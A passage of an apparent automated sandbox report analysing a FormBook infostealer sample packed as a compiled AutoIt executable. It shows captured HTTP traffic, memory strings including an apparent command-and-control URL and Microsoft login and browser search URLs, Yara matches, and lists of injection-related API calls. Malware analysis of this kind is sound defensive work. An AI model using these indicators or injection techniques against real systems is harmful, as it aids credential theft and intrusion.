4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 16:45:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BSiuZvHVQdQzd0pOY1uvF7RLdUWTO9zkP8mUnXKVc5PnnqMf7IZZ0ZXdiPSJ%2FxpO9smrLnXZiBCmR3GNLXRWcIThfuHJ0f5Vu%2FmH6mqEaoDioYJOs3l0ODf0Q37Ttft4uPoW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffe22de482f42d2-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1699&rtt_var=849&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=822&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 16:45:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vrZZp2tDNMoTseK6nSnDiJTFQaFn%2Fo3cDfrQKiXcvKT2dzH37rHp1mgSFGgNXzWZqITT42gafw%2BNBCdbFaG6yHSYnWSJHiObD6NBdg7LSwIee0iGNpvKaPR21vgg3XZp0Vi%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffe22eecacf43ee-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=34229&min_rtt=34229&rtt_var=17114&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10904&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 16:45:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q2ASWDf1zmEQ5OpbBMi5%2BQOuPlgyojZg1ufAF95wZ71HzGnpDMC1DHkQLy2%2Bgrf0uPNELC44iiEURriAHZd9Pc0IgObhRhruoZJ%2BHCDbEvqjm5ygOxvhFiPZ4SjEXGVudrNY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffe22fe3ae443ee-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1950&min_rtt=1950&rtt_var=975&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=533&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly
                Source: ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)
                Source: ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)
                Source: sUcUmdUxGfN.exe, 00000007.00000002.3015655468.00000000014B4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mzkd6gp5.top
                Source: sUcUmdUxGfN.exe, 00000007.00000002.3015655468.00000000014B4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mzkd6gp5.top/0hqe/
                Source: ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72
                Source: ROUTE.EXE, 00000006.00000002.3014722953.0000000002DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: ROUTE.EXE, 00000006.00000002.3014722953.0000000002DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: ROUTE.EXE, 00000006.00000002.3014722953.0000000002DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: ROUTE.EXE, 00000006.00000002.3014722953.0000000002DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: ROUTE.EXE, 00000006.00000002.3014722953.0000000002DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: ROUTE.EXE, 00000006.00000003.2458031272.0000000007CA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/cloudhost/
                Source: ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/jiaoyi/
                Source: ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/domain/
                Source: ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/mail/
                Source: ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/webhosting/
                Source: ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/ykj/view.asp?domain=313333.xyz
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DEEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00DEEAFF
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DEED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00DEED6A
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DEEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00DEEAFF
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DDAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00DDAA57
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00E09576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00E09576

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.2268978745.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3014344224.0000000002A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3015748227.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3015655468.0000000001430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3014639405.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2269397258.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2268552454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3015861642.00000000048D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: qlG7x91YXH.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: qlG7x91YXH.exe, 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4a218515-1
                Source: qlG7x91YXH.exe, 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_126e9829-0
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D73170 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00D73170
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00E0A2D7 NtdllDialogWndProc_W,0_2_00E0A2D7
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00E087B2 NtdllDialogWndProc_W,CallWindowProcW,0_2_00E087B2
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00E08AAA NtdllDialogWndProc_W,0_2_00E08AAA
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D88BA4 NtdllDialogWndProc_W,0_2_00D88BA4
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00E08FC9 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_00E08FC9
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00E090A1 SendMessageW,NtdllDialogWndProc_W,0_2_00E090A1
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D890A7 NtdllDialogWndProc_W,0_2_00D890A7
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D89052 NtdllDialogWndProc_W,0_2_00D89052
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00E0911E DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_00E0911E
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00E093CB NtdllDialogWndProc_W,0_2_00E093CB
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00E09380 NtdllDialogWndProc_W,0_2_00E09380
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00E09400 ClientToScreen,NtdllDialogWndProc_W,0_2_00E09400
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00E09576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00E09576
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00E0953A GetWindowLongW,NtdllDialogWndProc_W,0_2_00E0953A
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D897C0 GetParent,NtdllDialogWndProc_W,0_2_00D897C0
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D8997D NtdllDialogWndProc_W,GetSysColor,SetBkColor,745EC8D0,NtdllDialogWndProc_W,0_2_00D8997D
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00E09EF3 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,0_2_00E09EF3
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00E09E74 NtdllDialogWndProc_W,0_2_00E09E74
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00E09F86 GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,0_2_00E09F86
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042CBE3 NtClose,1_2_0042CBE3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B60 NtClose,LdrInitializeThunk,1_2_03C72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03C72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03C72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C735C0 NtCreateMutant,LdrInitializeThunk,1_2_03C735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C74340 NtSetContextThread,1_2_03C74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C74650 NtSuspendThread,1_2_03C74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BE0 NtQueryValueKey,1_2_03C72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BF0 NtAllocateVirtualMemory,1_2_03C72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B80 NtQueryInformationFile,1_2_03C72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BA0 NtEnumerateValueKey,1_2_03C72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AD0 NtReadFile,1_2_03C72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AF0 NtWriteFile,1_2_03C72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AB0 NtWaitForSingleObject,1_2_03C72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FE0 NtCreateFile,1_2_03C72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F90 NtProtectVirtualMemory,1_2_03C72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FA0 NtQuerySection,1_2_03C72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FB0 NtResumeThread,1_2_03C72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F60 NtCreateProcessEx,1_2_03C72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F30 NtCreateSection,1_2_03C72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72EE0 NtQueueApcThread,1_2_03C72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72E80 NtReadVirtualMemory,1_2_03C72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72EA0 NtAdjustPrivilegesToken,1_2_03C72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72E30 NtWriteVirtualMemory,1_2_03C72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DD0 NtDelayExecution,1_2_03C72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DB0 NtEnumerateKey,1_2_03C72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D00 NtSetInformationFile,1_2_03C72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D10 NtMapViewOfSection,1_2_03C72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D30 NtUnmapViewOfSection,1_2_03C72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CC0 NtQueryVirtualMemory,1_2_03C72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CF0 NtOpenProcess,1_2_03C72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CA0 NtQueryInformationToken,1_2_03C72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C60 NtCreateKey,1_2_03C72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C00 NtQueryInformationProcess,1_2_03C72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73090 NtSetValueKey,1_2_03C73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73010 NtOpenDirectoryObject,1_2_03C73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C739B0 NtGetContextThread,1_2_03C739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73D70 NtOpenThread,1_2_03C73D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73D10 NtOpenProcessToken,1_2_03C73D10
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D4340 NtSetContextThread,LdrInitializeThunk,6_2_032D4340
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D4650 NtSuspendThread,LdrInitializeThunk,6_2_032D4650
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2B60 NtClose,LdrInitializeThunk,6_2_032D2B60
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_032D2BA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_032D2BE0
